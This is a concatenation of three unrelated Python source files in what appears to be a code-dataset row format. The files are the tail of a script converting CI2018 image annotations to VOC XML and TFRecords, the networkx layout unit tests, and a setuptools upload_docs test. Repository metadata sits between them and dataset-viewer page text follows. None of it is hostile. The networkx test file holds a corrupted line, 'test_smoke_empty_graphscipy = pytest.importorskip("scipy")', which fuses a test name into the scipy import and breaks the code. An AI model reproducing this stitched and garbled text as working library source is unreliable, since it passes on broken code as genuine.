ymax = child3.text
if child3.tag == 'ymin':
ymin = child3.text
return (folder, filename, database, width, height,
name, xmax, xmin, ymax, ymin)
def make_voc_directories(voc_path):
"""
Create directories for images and labels.
NOTE: Removes previously created directories.
Parameters:
voc_path - path to voc directory to create
Returns:
None
"""
if os.path.exists(voc_path):
shutil.rmtree(voc_path)
os.makedirs(voc_path)
os.makedirs(os.path.join(voc_path, 'CI2018'))
os.makedirs(os.path.join(voc_path, 'CI2018', 'Annotations'))
os.makedirs(os.path.join(voc_path, 'CI2018', 'JPEGImages'))
def determine_prepend(vid_path):
"""
Create the string to prepend to the file name.
Parameters:
vid_path - full path name to video directory
Returns:
prepend - string to prepend to filename.
"""
vid_1 = vid_path.rstrip('/').split('/')[-1].split('(')[0]
vid_2 = vid_path.rstrip('/').split('/')[-1].split('(')[-1].split(')')[0]
vid_3 = vid_path.rstrip('/').split('/')[-1].split('(')[-1].split(')')[-1].split('-')[-1]
if vid_1 == vid_2:
return vid_1
if vid_2 == vid_3:
return vid_1 + '_' + vid_2
else:
return vid_1 + '_' + vid_2 + '_' + vid_3
def copy_images(ci_path, voc_path):
"""
Copy images from the CI directory to VOC JPEGImages directory
while renaming all images.
Images are renamed by prepending the "video" (directory) name.
Ex: 360(12)-2/0001.jpg -> 360_12_2_0001.jpg
Parameters:
ci_path - path to original CI training data
voc_path - path to VOC JPEGImages directory to write to
Returns:
None
"""
for video in sorted(os.listdir(ci_path)):
if video == '.DS_Store': # For MAC
continue
vid_path = os.path.join(ci_path, video)
#prepend = determine_prepend(vid_path)
prepend = video
for filename in os.listdir(os.path.join(ci_path, video)):
if filename.split('.')[-1] == 'jpg':
jpg = os.path.join(ci_path, video, filename)
shutil.copy(jpg, os.path.join(voc_path, 'CI2018', 'JPEGImages', prepend + '_' + filename))
def write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin, xml, voc_path):
"""
Write XML file in VOC format
Parameters:
fd - folder
fn - filename
db - database
w - width
h - height
name - object class
xmax - lower right x coordinate
xmin - upper left x coordinate
ymax - lower right y coordinate
ymin - upper left y coordinate
xml - xml file name
voc_path - path to write XML file
Returns:
None
"""
full_fn = xml.split('/')[-1]
xml_fn = full_fn.split('.')[0] + '.xml'
f = open(os.path.join(voc_path, 'CI2018', 'Annotations', xml_fn), 'w')
line = '<annotation>\n'; f.write(line)
line = '\t<filename>' + full_fn + '</filename>\n'; f.write(line)
line = '\t<folder>' + fd + '</folder>\n'; f.write(line)
line = '\t<object>\n'; f.write(line)
line = '\t\t<name>' + name + '</name>\n'; f.write(line)
line = '\t\t<bndbox>\n'; f.write(line)
line = '\t\t\t<xmax>' + xmax + '</xmax>\n'; f.write(line)
line = '\t\t\t<xmin>' + xmin + '</xmin>\n'; f.write(line)
line = '\t\t\t<ymax>' + ymax + '</ymax>\n'; f.write(line)
line = '\t\t\t<ymin>' + ymin + '</ymin>\n'; f.write(line)
line = '\t\t</bndbox>\n'; f.write(line)
if not xmax == '' or not xmin == '' or not ymax == '' or not ymin == '':
if int(xmax)-int(xmin) < 10 or int(ymax)-int(ymin) < 10:
line = '\t\t<difficult>1</difficult>\n'; f.write(line)
else:
line = '\t\t<difficult>0</difficult>\n'; f.write(line)
else:
line = '\t\t<difficult>0</difficult>\n'; f.write(line)
line = '\t\t<occluded>0</occluded>\n'; f.write(line)
line = '\t\t<pose>Unspecified</pose>\n'; f.write(line)
line = '\t\t<truncated>0</truncated>\n'; f.write(line)
line = '\t</object>\n'; f.write(line)
line = '\t<segmented>0</segmented>\n'; f.write(line)
line = '\t<size>\n'; f.write(line)
line = '\t\t<depth>3</depth>\n'; f.write(line)
line = '\t\t<height>' + h + '</height>\n'; f.write(line)
line = '\t\t<width>' + w + '</width>\n'; f.write(line)
line = '\t</size>\n'; f.write(line)
line = '\t<source>\n'; f.write(line)
line = '\t\t<database>' + db + '</database>\n'; f.write(line)
line = '\t</source>\n'; f.write(line)
line = '</annotation>'; f.write(line)
f.close()
def write_pbtxt(class_labels, type_data):
"""
Write .pbtxt file with a list of all classes in dataset
Parameters:
class_labels - list of dataset classes (sorted)
type_data - type of data (13 or 100)
Returns:
None
"""
if not os.path.exists('data'):
os.makedirs('data')
if type_data == 13:
f = open(os.path.join('data', 'ci_label_map_coarse.pbtxt'), 'w')
else:
f = open(os.path.join('data', 'ci_label_map.pbtxt'), 'w')
#f = open(os.path.join('data', 'ci_label_map_' + str(type_data) + '.pbtxt'), 'w')
for idx, label in enumerate(class_labels):
line = 'item {\n'; f.write(line)
line = '\tid: ' + str(idx+1) + '\n'; f.write(line)
line = '\tname: "' + label + '"\n}\n'; f.write(line)
f.close()
def convert_xml(ci_path, voc_path, type_data):
"""
Copy XML files from the CI directory to VOC Annotations directory
while converting the contents of the XML file and renaming based on the
image.
XML files will be named by prepending the "video" (directory) name.
Ex. 360(12)-2/0001.xml -> 360_12_2_0001.xml
Parameters:
ci_path - path to original CI training data
voc_path - path to VOC Annotations directory to write to
type_data - 13-class dataset or 100-class dataset
Returns:
None
"""
class_labels = []
num_noname = 0
for video in sorted(os.listdir(ci_path)):
if video == '.DS_Store': # For MAC
continue
vid_path = os.path.join(ci_path, video)
prepend = determine_prepend(vid_path)
for filename in os.listdir(os.path.join(ci_path, video)):
if filename.split('.')[-1] == 'xml':
xml = os.path.join(ci_path, video, filename)
xml_fn = prepend + '_' + filename
# fd = folder
# fn = filename
# db = database
# w, h = image width, height
fd, fn, db, w, h, name, xmax, xmin, ymax, ymin = read_ci_xml(xml, type_data)
if not name == '' and not name in class_labels:
class_labels.append(name)
if name == '':
num_noname += 1
#write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin,
# xml_fn, voc_path)
jpg_fn = xml_fn.split('.')[0] + '.jpg'
write_xml(fd, fn, db, w, h, name, xmax, xmin, ymax, ymin,
jpg_fn, voc_path)
return class_labels, num_noname
### Re-ID Utilities
def reid_read_xml(xml_file):
"""
Read XML tree structure to get bounding box coordinates
Parameters:
xml_file - XML file in CI format
Returns:
xmax - bottom right x coordinate
xmin - top left x coordinate
ymax - bottom right y coordinate
ymin - top left y coordinate
"""
tree = etree.parse(xml_file)
root = tree.getroot()
xmin, xmax, ymin, ymax = '', '', '', ''
for child in root:
if child.tag == 'object':
for child2 in child:
if child2.tag == 'bndbox':
for child3 in child2:
if child3.tag == 'xmax':
xmax = child3.text
if child3.tag == 'xmin':
xmin = child3.text
if child3.tag == 'ymax':
ymax = child3.text
if child3.tag == 'ymin':
ymin = child3.text
return (xmax, xmin, ymax, ymin)
### TFRecord Utils
def dict_to_tf_example(data,
dataset_directory,
label_map_dict,
ignore_difficult_instances=False,
image_subdirectory='JPEGImages'):
"""Convert XML derived dict to tf.Example proto.
Notice that this function normalizes the bounding box coordinates provided
by the raw data.
Args:
data: dict holding CI XML fields for a single image (obtained by
running dataset_util.recursive_parse_xml_to_dict)
dataset_directory: Path to root directory holding CI dataset
label_map_dict: A map from string label names to integers ids.
ignore_difficult_instances: Whether to skip difficult instances in the
dataset (default: False).
image_subdirectory: String specifying subdirectory within the
CI dataset directory holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by data['filename'] is not a valid JPEG
"""
#img_path = os.path.join(data['folder'], image_subdirectory, data['filename'])
img_path = os.path.join('CI2018', image_subdirectory, data['filename'])
full_path = os.path.join(dataset_directory, img_path)
with tf.gfile.GFile(full_path, 'rb') as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = PIL.Image.open(encoded_jpg_io)
if image.format != 'JPEG':
raise ValueError('Image format not JPEG')
key = hashlib.sha256(encoded_jpg).hexdigest()
width = int(data['size']['width'])
height = int(data['size']['height'])
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
truncated = []
poses = []
difficult_obj = []
for obj in data['object']:
difficult = bool(int(obj['difficult']))
if ignore_difficult_instances and difficult:
continue
difficult_obj.append(int(difficult))
if obj['bndbox']['xmin'] is None or obj['bndbox']['xmax'] is None or obj['bndbox']['ymin'] is None or obj['bndbox']['ymax'] is None:
continue
xmin.append(float(obj['bndbox']['xmin']) / width)
ymin.append(float(obj['bndbox']['ymin']) / height)
xmax.append(float(obj['bndbox']['xmax']) / width)
ymax.append(float(obj['bndbox']['ymax']) / height)
classes_text.append(obj['name'].encode('utf8'))
classes.append(label_map_dict[obj['name']])
truncated.append(int(obj['truncated']))
poses.append(obj['pose'].encode('utf8'))
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_util.int64_feature(height),
'image/width': dataset_util.int64_feature(width),
'image/filename': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/source_id': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text),
'image/object/class/label': dataset_util.int64_list_feature(classes),
'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),
'image/object/truncated': dataset_util.int64_list_feature(truncated),
'image/object/view': dataset_util.bytes_list_feature(poses),
}))
return example | mit |
SpaceGroupUCL/qgisSpaceSyntaxToolkit | esstoolkit/external/networkx/drawing/tests/test_layout.py | 1 | 15534 | """Unit tests for layout functions."""
import networkx as nx
from networkx.testing import almost_equal
import pytest
numpy = pytest.importorskip("numpy")
test_smoke_empty_graphscipy = pytest.importorskip("scipy")
class TestLayout:
@classmethod
def setup_class(cls):
cls.Gi = nx.grid_2d_graph(5, 5)
cls.Gs = nx.Graph()
nx.add_path(cls.Gs, "abcdef")
cls.bigG = nx.grid_2d_graph(25, 25) # > 500 nodes for sparse
@staticmethod
def collect_node_distances(positions):
distances = []
prev_val = None
for k in positions:
if prev_val is not None:
diff = positions[k] - prev_val
distances.append(numpy.dot(diff, diff) ** 0.5)
prev_val = positions[k]
return distances
def test_spring_fixed_without_pos(self):
G = nx.path_graph(4)
pytest.raises(ValueError, nx.spring_layout, G, fixed=[0])
pos = {0: (1, 1), 2: (0, 0)}
pytest.raises(ValueError, nx.spring_layout, G, fixed=[0, 1], pos=pos)
nx.spring_layout(G, fixed=[0, 2], pos=pos) # No ValueError
def test_spring_init_pos(self):
# Tests GH #2448
import math
G = nx.Graph()
G.add_edges_from([(0, 1), (1, 2), (2, 0), (2, 3)])
init_pos = {0: (0.0, 0.0)}
fixed_pos = [0]
pos = nx.fruchterman_reingold_layout(G, pos=init_pos, fixed=fixed_pos)
has_nan = any(math.isnan(c) for coords in pos.values() for c in coords)
assert not has_nan, "values should not be nan"
def test_smoke_empty_graph(self):
G = []
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.spectral_layout(G)
nx.shell_layout(G)
nx.bipartite_layout(G, G)
nx.spiral_layout(G)
nx.multipartite_layout(G)
nx.kamada_kawai_layout(G)
def test_smoke_int(self):
G = self.Gi
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.fruchterman_reingold_layout(self.bigG)
nx.spectral_layout(G)
nx.spectral_layout(G.to_directed())
nx.spectral_layout(self.bigG)
nx.spectral_layout(self.bigG.to_directed())
nx.shell_layout(G)
nx.spiral_layout(G)
nx.kamada_kawai_layout(G)
nx.kamada_kawai_layout(G, dim=1)
nx.kamada_kawai_layout(G, dim=3)
def test_smoke_string(self):
G = self.Gs
nx.random_layout(G)
nx.circular_layout(G)
nx.planar_layout(G)
nx.spring_layout(G)
nx.fruchterman_reingold_layout(G)
nx.spectral_layout(G)
nx.shell_layout(G)
nx.spiral_layout(G)
nx.kamada_kawai_layout(G)
nx.kamada_kawai_layout(G, dim=1)
nx.kamada_kawai_layout(G, dim=3)
def check_scale_and_center(self, pos, scale, center):
center = numpy.array(center)
low = center - scale
hi = center + scale
vpos = numpy.array(list(pos.values()))
length = vpos.max(0) - vpos.min(0)
assert (length <= 2 * scale).all()
assert (vpos >= low).all()
assert (vpos <= hi).all()
def test_scale_and_center_arg(self):
sc = self.check_scale_and_center
c = (4, 5)
G = nx.complete_graph(9)
G.add_node(9)
sc(nx.random_layout(G, center=c), scale=0.5, center=(4.5, 5.5))
# rest can have 2*scale length: [-scale, scale]
sc(nx.spring_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.spectral_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.circular_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.shell_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.spiral_layout(G, scale=2, center=c), scale=2, center=c)
sc(nx.kamada_kawai_layout(G, scale=2, center=c), scale=2, center=c)
c = (2, 3, 5)
sc(nx.kamada_kawai_layout(G, dim=3, scale=2, center=c), scale=2, center=c)
def test_planar_layout_non_planar_input(self):
G = nx.complete_graph(9)
pytest.raises(nx.NetworkXException, nx.planar_layout, G)
def test_smoke_planar_layout_embedding_input(self):
embedding = nx.PlanarEmbedding()
embedding.set_data({0: [1, 2], 1: [0, 2], 2: [0, 1]})
nx.planar_layout(embedding)
def test_default_scale_and_center(self):
sc = self.check_scale_and_center
c = (0, 0)
G = nx.complete_graph(9)
G.add_node(9)
sc(nx.random_layout(G), scale=0.5, center=(0.5, 0.5))
sc(nx.spring_layout(G), scale=1, center=c)
sc(nx.spectral_layout(G), scale=1, center=c)
sc(nx.circular_layout(G), scale=1, center=c)
sc(nx.shell_layout(G), scale=1, center=c)
sc(nx.spiral_layout(G), scale=1, center=c)
sc(nx.kamada_kawai_layout(G), scale=1, center=c)
c = (0, 0, 0)
sc(nx.kamada_kawai_layout(G, dim=3), scale=1, center=c)
def test_circular_planar_and_shell_dim_error(self):
G = nx.path_graph(4)
pytest.raises(ValueError, nx.circular_layout, G, dim=1)
pytest.raises(ValueError, nx.shell_layout, G, dim=1)
pytest.raises(ValueError, nx.shell_layout, G, dim=3)
pytest.raises(ValueError, nx.planar_layout, G, dim=1)
pytest.raises(ValueError, nx.planar_layout, G, dim=3)
def test_adjacency_interface_numpy(self):
A = nx.to_numpy_array(self.Gs)
pos = nx.drawing.layout._fruchterman_reingold(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._fruchterman_reingold(A, dim=3)
assert pos.shape == (6, 3)
pos = nx.drawing.layout._sparse_fruchterman_reingold(A)
assert pos.shape == (6, 2)
def test_adjacency_interface_scipy(self):
A = nx.to_scipy_sparse_matrix(self.Gs, dtype="d")
pos = nx.drawing.layout._sparse_fruchterman_reingold(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._sparse_spectral(A)
assert pos.shape == (6, 2)
pos = nx.drawing.layout._sparse_fruchterman_reingold(A, dim=3)
assert pos.shape == (6, 3)
def test_single_nodes(self):
G = nx.path_graph(1)
vpos = nx.shell_layout(G)
assert not vpos[0].any()
G = nx.path_graph(4)
vpos = nx.shell_layout(G, [[0], [1, 2], [3]])
assert not vpos[0].any()
assert vpos[3].any() # ensure node 3 not at origin (#3188)
assert numpy.linalg.norm(vpos[3]) <= 1 # ensure node 3 fits (#3753)
vpos = nx.shell_layout(G, [[0], [1, 2], [3]], rotate=0)
assert numpy.linalg.norm(vpos[3]) <= 1 # ensure node 3 fits (#3753)
def test_smoke_initial_pos_fruchterman_reingold(self):
pos = nx.circular_layout(self.Gi)
npos = nx.fruchterman_reingold_layout(self.Gi, pos=pos)
def test_fixed_node_fruchterman_reingold(self):
# Dense version (numpy based)
pos = nx.circular_layout(self.Gi)
npos = nx.spring_layout(self.Gi, pos=pos, fixed=[(0, 0)])
assert tuple(pos[(0, 0)]) == tuple(npos[(0, 0)])
# Sparse version (scipy based)
pos = nx.circular_layout(self.bigG)
npos = nx.spring_layout(self.bigG, pos=pos, fixed=[(0, 0)])
for axis in range(2):
assert almost_equal(pos[(0, 0)][axis], npos[(0, 0)][axis])
def test_center_parameter(self):
G = nx.path_graph(1)
nx.random_layout(G, center=(1, 1))
vpos = nx.circular_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.planar_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spring_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.fruchterman_reingold_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spectral_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.shell_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
vpos = nx.spiral_layout(G, center=(1, 1))
assert tuple(vpos[0]) == (1, 1)
def test_center_wrong_dimensions(self):
G = nx.path_graph(1)
assert id(nx.spring_layout) == id(nx.fruchterman_reingold_layout)
pytest.raises(ValueError, nx.random_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.circular_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.planar_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spring_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spring_layout, G, dim=3, center=(1, 1))
pytest.raises(ValueError, nx.spectral_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spectral_layout, G, dim=3, center=(1, 1))
pytest.raises(ValueError, nx.shell_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.spiral_layout, G, center=(1, 1, 1))
pytest.raises(ValueError, nx.kamada_kawai_layout, G, center=(1, 1, 1))
def test_empty_graph(self):
G = nx.empty_graph()
vpos = nx.random_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.circular_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.planar_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.bipartite_layout(G, G)
assert vpos == {}
vpos = nx.spring_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.fruchterman_reingold_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.spectral_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.shell_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.spiral_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.multipartite_layout(G, center=(1, 1))
assert vpos == {}
vpos = nx.kamada_kawai_layout(G, center=(1, 1))
assert vpos == {}
def test_bipartite_layout(self):
G = nx.complete_bipartite_graph(3, 5)
top, bottom = nx.bipartite.sets(G)
vpos = nx.bipartite_layout(G, top)
assert len(vpos) == len(G)
top_x = vpos[list(top)[0]][0]
bottom_x = vpos[list(bottom)[0]][0]
for node in top:
assert vpos[node][0] == top_x
for node in bottom:
assert vpos[node][0] == bottom_x
vpos = nx.bipartite_layout(
G, top, align="horizontal", center=(2, 2), scale=2, aspect_ratio=1
)
assert len(vpos) == len(G)
top_y = vpos[list(top)[0]][1]
bottom_y = vpos[list(bottom)[0]][1]
for node in top:
assert vpos[node][1] == top_y
for node in bottom:
assert vpos[node][1] == bottom_y
pytest.raises(ValueError, nx.bipartite_layout, G, top, align="foo")
def test_multipartite_layout(self):
sizes = (0, 5, 7, 2, 8)
G = nx.complete_multipartite_graph(*sizes)
vpos = nx.multipartite_layout(G)
assert len(vpos) == len(G)
start = 0
for n in sizes:
end = start + n
assert all(vpos[start][0] == vpos[i][0] for i in range(start + 1, end))
start += n
vpos = nx.multipartite_layout(G, align="horizontal", scale=2, center=(2, 2))
assert len(vpos) == len(G)
start = 0
for n in sizes:
end = start + n
assert all(vpos[start][1] == vpos[i][1] for i in range(start + 1, end))
start += n
pytest.raises(ValueError, nx.multipartite_layout, G, align="foo")
def test_kamada_kawai_costfn_1d(self):
costfn = nx.drawing.layout._kamada_kawai_costfn
pos = numpy.array([4.0, 7.0])
invdist = 1 / numpy.array([[0.1, 2.0], [2.0, 0.3]])
cost, grad = costfn(pos, numpy, invdist, meanweight=0, dim=1)
assert almost_equal(cost, ((3 / 2.0 - 1) ** 2))
assert almost_equal(grad[0], -0.5)
assert almost_equal(grad[1], 0.5)
def check_kamada_kawai_costfn(self, pos, invdist, meanwt, dim):
costfn = nx.drawing.layout._kamada_kawai_costfn
cost, grad = costfn(pos.ravel(), numpy, invdist, meanweight=meanwt, dim=dim)
expected_cost = 0.5 * meanwt * numpy.sum(numpy.sum(pos, axis=0) ** 2)
for i in range(pos.shape[0]):
for j in range(i + 1, pos.shape[0]):
diff = numpy.linalg.norm(pos[i] - pos[j])
expected_cost += (diff * invdist[i][j] - 1.0) ** 2
assert almost_equal(cost, expected_cost)
dx = 1e-4
for nd in range(pos.shape[0]):
for dm in range(pos.shape[1]):
idx = nd * pos.shape[1] + dm
pos0 = pos.flatten()
pos0[idx] += dx
cplus = costfn(
pos0, numpy, invdist, meanweight=meanwt, dim=pos.shape[1]
)[0]
pos0[idx] -= 2 * dx
cminus = costfn(
pos0, numpy, invdist, meanweight=meanwt, dim=pos.shape[1]
)[0]
assert almost_equal(grad[idx], (cplus - cminus) / (2 * dx), places=5)
def test_kamada_kawai_costfn(self):
invdist = 1 / numpy.array([[0.1, 2.1, 1.7], [2.1, 0.2, 0.6], [1.7, 0.6, 0.3]])
meanwt = 0.3
# 2d
pos = numpy.array([[1.3, -3.2], [2.7, -0.3], [5.1, 2.5]])
self.check_kamada_kawai_costfn(pos, invdist, meanwt, 2)
# 3d
pos = numpy.array([[0.9, 8.6, -8.7], [-10, -0.5, -7.1], [9.1, -8.1, 1.6]])
self.check_kamada_kawai_costfn(pos, invdist, meanwt, 3)
def test_spiral_layout(self):
G = self.Gs
# a lower value of resolution should result in a more compact layout
# intuitively, the total distance from the start and end nodes
# via each node in between (transiting through each) will be less,
# assuming rescaling does not occur on the computed node positions
pos_standard = nx.spiral_layout(G, resolution=0.35)
pos_tighter = nx.spiral_layout(G, resolution=0.34)
distances = self.collect_node_distances(pos_standard)
distances_tighter = self.collect_node_distances(pos_tighter)
assert sum(distances) > sum(distances_tighter)
# return near-equidistant points after the first value if set to true
pos_equidistant = nx.spiral_layout(G, equidistant=True)
distances_equidistant = self.collect_node_distances(pos_equidistant)
for d in range(1, len(distances_equidistant) - 1):
# test similarity to two decimal places
assert almost_equal(
distances_equidistant[d], distances_equidistant[d + 1], 2
)
def test_rescale_layout_dict(self):
G = nx.empty_graph()
vpos = nx.random_layout(G, center=(1, 1))
assert nx.rescale_layout_dict(vpos) == {}
G = nx.empty_graph(2)
vpos = {0: (0.0, 0.0), 1: (1.0, 1.0)}
s_vpos = nx.rescale_layout_dict(vpos)
norm = numpy.linalg.norm
assert norm([sum(x) for x in zip(*s_vpos.values())]) < 1e-6
G = nx.empty_graph(3)
vpos = {0: (0, 0), 1: (1, 1), 2: (0.5, 0.5)}
s_vpos = nx.rescale_layout_dict(vpos)
assert s_vpos == {0: (-1, -1), 1: (1, 1), 2: (0, 0)}
s_vpos = nx.rescale_layout_dict(vpos, scale=2)
assert s_vpos == {0: (-2, -2), 1: (2, 2), 2: (0, 0)}
| gpl-3.0 |
vivianli32/TravelConnect | flask/lib/python3.4/site-packages/setuptools/tests/test_upload_docs.py | 522 | 2139 | """build_ext tests
"""
import sys, os, shutil, tempfile, unittest, site, zipfile
from setuptools.command.upload_docs import upload_docs
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo')
"""
class TestUploadDocsTest(unittest.TestCase):
def setUp(self):
self.dir = tempfile.mkdtemp()
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'w')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
os.chdir(self.dir)
self.upload_dir = os.path.join(self.dir, 'build')
os.mkdir(self.upload_dir)
# A test document.
f = open(os.path.join(self.upload_dir, 'index.html'), 'w')
f.write("Hello world.")
f.close()
# An empty folder.
os.mkdir(os.path.join(self.upload_dir, 'empty'))
if sys.version >= "2.6":
self.old_base = site.USER_BASE
site.USER_BASE = upload_docs.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = upload_docs.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
if sys.version >= "2.6":
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_create_zipfile(self):
# Test to make sure zipfile creation handles common cases.
# This explicitly includes a folder containing an empty folder.
dist = Distribution()
cmd = upload_docs(dist)
cmd.upload_dir = self.upload_dir
cmd.target_dir = self.upload_dir
tmp_dir = tempfile.mkdtemp()
tmp_file = os.path.join(tmp_dir, 'foo.zip')
try:
zip_file = cmd.create_zipfile(tmp_file)
assert zipfile.is_zipfile(tmp_file)
zip_file = zipfile.ZipFile(tmp_file) # woh...
assert zip_file.namelist() == ['index.html']
zip_file.close()
finally:
shutil.rmtree(tmp_dir)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.